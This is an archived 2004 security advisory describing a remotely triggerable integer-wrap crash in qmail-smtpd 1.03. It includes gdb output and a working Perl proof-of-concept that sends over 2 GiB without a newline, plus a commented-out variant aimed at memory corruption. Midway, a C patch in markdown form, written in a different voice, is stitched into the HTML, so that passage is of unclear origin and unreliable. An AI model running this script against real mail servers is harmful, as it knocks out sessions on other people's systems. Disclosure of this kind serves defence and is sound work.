qmailcrash.html
Posted Jan 19, 2004
Authored by Georgi Guninski | Site guninski.com

Georgi Guninski security advisory #65, 2004 - Qmail version 1.03 is susceptible to a couple of attacks. A crash in qmail-smtpd occurs with a long SMTP session. The crash is not global; it affects only the current SMTP session. It is also possible to trigger a segmentation violation (SEGV) from the network.

tags | advisory
SHA-256 | 10dae39fc506d25c870163518f0077627ecaf939966caa0aad04678186ced065

<!DOCTYPE doctype PUBLIC "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<link rel="stylesheet" title="Default" href="main.css">
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title>Lame crash in qmail-smtpd, yet still qmail much better than windows</title>
</head>
<body style="color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
<center>
<h2>Lame crash in qmail-smtpd,&nbsp;
yet still qmail much better than windows</h2>
</center>
<table border="0" cellspacing="0" cellpadding="0" width="90%"
align="center">
<tbody>
<tr>
<td width="100%">
<table border="0" width="100%">
<tbody>
<tr>
<td valign="top" width="84%">
<div style="margin-left: 1em;"><br>
Georgi Guninski security advisory #65, 2004<br>
<br>
<span style="font-weight: bold;">Version 2.0</span> -
corrects stuff from the original announcement.<br>
<br>
Lame crash in qmail-smtpd and memory overwrite according to gdb, yet
still qmail much better than windows<br>
<br>
Systems affected:<br>
qmail 1.03 on linux, don't know about other OSes.<br>
<br>
<br>
Risk: Very low.<br>
Date: 15 January 2004<br>
Updated: 26 January.<br>
Version 1 is not correct but available <a href="qmailcrash1.html">here</a><br>
<br>
Legal Notice:<br>
This Advisory is Copyright (c) 2004 Georgi Guninski.<br>
You may distribute it unmodified.<br>
You may not modify it and distribute it or distribute parts<br>
of it without the author's written permission - this especially applies to<br>
so called "vulnerabilities databases" and securityfocus, microsoft, cert<br>
and mitre.<br>
If you want to link to this content use the URL:<br>
<a href="http://www.guninski.com/qmailcrash.html">http://www.guninski.com/qmailcrash.html</a><br>
Anything in this document may change without notice.<br>
<br>
Disclaimer:<br>
The information in this advisory is believed to be true though<br>
it may be false.<br>
The opinions expressed in this advisory and program are my own and<br>
not of any company. The usual standard disclaimer applies,<br>
especially the fact that Georgi Guninski is not liable for any damages<br>
caused by direct or indirect use of the information or functionality<br>
provided by this advisory or program. Georgi Guninski bears no<br>
responsibility for content or misuse of this advisory or program or<br>
any derivatives thereof.<br>
<br>
Description:<br>
Actually there are two different problems:<br>
a) It is possible to crash qmail-smtpd 1.03 remotely with a long SMTP<br>
session. The crash is not global, it affects only the current SMTP
session.<br>
<br>
about a)<br>
It is possible to trigger a segmentation violation (SEGV) in qmail-smtpd 1.03<br>
on linux from the network.<br>
<br>
The problem is in:<br>
<pre>void blast(hops)
int *hops;
...
int pos; /* number of bytes since most recent \n, if fih */
...
   if (pos &lt; 9) {
        if (ch != "delivered"[pos]) if (ch != "DELIVERED"[pos]) flagmaybez = 0;
...
++pos;
...
</pre>
<br>
pos is a signed int that is incremented for every byte until a newline is seen. <br>
When it is incremented long enough, it wraps and becomes negative, and the check <br>
(pos &lt; 9) passes while pos is 0x80000000 (see the gdb output below). <br>
Then "delivered"[pos] indexes far outside the string literal and causes a segmentation violation.<br>
<br>
Don't know whether an RFC-compliant message can trigger this.<br>
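One way to close the wrap, as an added example that is my own code and not the advisory's or qmail's: the same prefix scan (with the Received branch of the function, which the excerpt elides, rendered the same way), where pos is only incremented while it is still below 9. pos serves nothing but those comparisons, so this keeps the hop counting and bounds every index for any line length. The names scan_state, scan_init, scan_byte and scan_headers are mine.<br>

```c
/* Added example (my own code, not from the advisory or from qmail): a model of
 * the header-prefix scan in qmail-smtpd's blast() with the byte counter bounded
 * so it cannot wrap.  Names scan_state, scan_init, scan_byte, scan_headers are mine. */
#include <stddef.h>
#include <string.h>

struct scan_state {
    int pos;        /* bytes since the last '\n', saturated at 9 */
    int flagmaybex; /* 1 while this line might still start with "Received" */
    int flagmaybez; /* 1 while this line might still start with "Delivered" */
    int hops;       /* Received / Delivered-To headers counted so far */
};

void scan_init(struct scan_state *s) {
    s->pos = 0;
    s->flagmaybex = s->flagmaybez = 1;
    s->hops = 0;
}

/* Feed one byte of header text.  Same comparisons as the page's excerpt, but
 * pos is only incremented while it is still below 9.  pos serves nothing but
 * these comparisons, so saturating it keeps the behaviour for short prefixes
 * and removes the 2^31-byte wrap: every index into the literals is 0..8 by
 * construction, however long the line gets. */
void scan_byte(struct scan_state *s, char ch) {
    if (s->pos < 9) {
        if (ch != "delivered"[s->pos] && ch != "DELIVERED"[s->pos]) s->flagmaybez = 0;
        if (s->flagmaybez && s->pos == 8) ++s->hops;
        if (s->pos < 8 && ch != "received"[s->pos] && ch != "RECEIVED"[s->pos]) s->flagmaybex = 0;
        if (s->flagmaybex && s->pos == 7) ++s->hops;
        ++s->pos;
    }
    if (ch == '\n') { /* end of line: restart the prefix match */
        s->pos = 0;
        s->flagmaybex = s->flagmaybez = 1;
    }
}

/* Scan a whole header block and return the hop count. */
int scan_headers(const char *buf, size_t len) {
    struct scan_state s;
    size_t i;
    scan_init(&s);
    for (i = 0; i < len; i++) scan_byte(&s, buf[i]);
    return s.hops;
}
```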
<br>
Here is a log of the crash:<br>
<pre>./qma4.pl localhost 25
qmail-smtpd SEGV. Written by Georgi Guninski
Will connect to localhost:25 fromaddr=you@email touser=postmaster
length=2097152
...
&lt;in another console&gt;
ps awx | grep qmail-smtpd
 1810 ?        R      0:06 qmail-smtpd

gdb attach 1810
GNU gdb
(gdb) cont
&lt;wait&gt;
Program received signal SIGSEGV, Segmentation fault.
0x0804937c in blast (hops=0xbffffd8c) at qmail-smtpd.c:321
321             if (ch != "delivered"[pos]) if (ch != "DELIVERED"[pos]) flagmaybez = 0;
(gdb) p pos
$1 = -2147483648
(gdb) p/x pos
$2 = 0x80000000
(gdb)
</pre>
----qma4.pl----<br>
<pre>#!/usr/bin/perl -w

#Copyright Georgi Guninski\nCannot be used in vulnerability databases and 
#similar stuff

use IO::Socket;

my $port = $ARGV[1];
my $host = $ARGV[0];

my $socket = IO::Socket::INET-&gt;new(PeerAddr =&gt; $host, PeerPort =&gt; $port, Proto =&gt; "TCP") || die "socket";

# SMTP envelope, then DATA; the message follows.
my $req = "HELO a\r\n";
my $fromaddr = "you\@email";
my $touser = "postmaster";

print "qmail-smtpd SEGV. Copyright Georgi Guninski\nCannot be used in vulnerability databases and similar stuff\nWill connect to ${host}:${port} fromaddr=${fromaddr} touser=${touser}\n";

$req .= "MAIL FROM: ${fromaddr}\r\n";
$req .= "RCPT TO: ${touser}\r\n";
$req .= "DATA\r\n";

$req .= "1234567890";

#my $x = "\ng" x 100;
#print $x;

syswrite($socket, $req, length($req));

# One 2 MiB chunk with no newline, sent 1025 times (2050 MiB in total), so the
# first header line exceeds 2^31 bytes and the signed counter pos wraps.
my $l1 = 1024*1024;
my $p1 = "gg" x $l1;
my $pl = 2*$l1;
print "length=${pl}\n";
my $towrite = $l1*2050;
my $wri = 0;
$req = $p1;
while ($wri &lt; $towrite)
{
    syswrite($socket, $req, $pl);
    if ( ($wri % $l1) == 0) { print "written=" . $wri/$l1 . "\n"; }
    # !!! uncomment the following lines to get qmail memory screw on linux according to gdb
    #if ($wri/$l1 == 2044) 
    #{
    #syswrite($socket,"g\r\n",3);print "injected\n";
    #};
    $wri += $pl;
}

# Terminate the message and print whatever the server still says.
$req = "test\r\n";
$req .= ".\r\n";
syswrite($socket, $req, length($req));

while (&lt;$socket&gt;)
{
    print $_;
}

close $socket;
</pre>
--------------<br>
<br>
Workaround: Not tested, but setting a quota on the receiving mailbox may help.<br>
<br>
Vendor status:<br>
djb@cr.yp.to was notified about a) on Mon, 12 Jan 2004 16:06:06 +0200<br>
Message-Id: &lt;200401121405.QAA06863@home.ntrl.net&gt;<br>
Didn't hear from him.<br>
His qsecretary wanted me to not be a spammer and I confirmed I am not a<br>
spammer to: <br>
To: "The qsecretary program"
&lt;djb-notbulkmail-22ecb0d6842839ad68e79ccb452a3f09@cr.yp.to&gt;<br>
<br>
Regards,<br>
Georgi Guninski<br>
http://www.guninski.com<br>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td> <br>
</td>
</tr>
</tbody>
</table>
</body>
</html>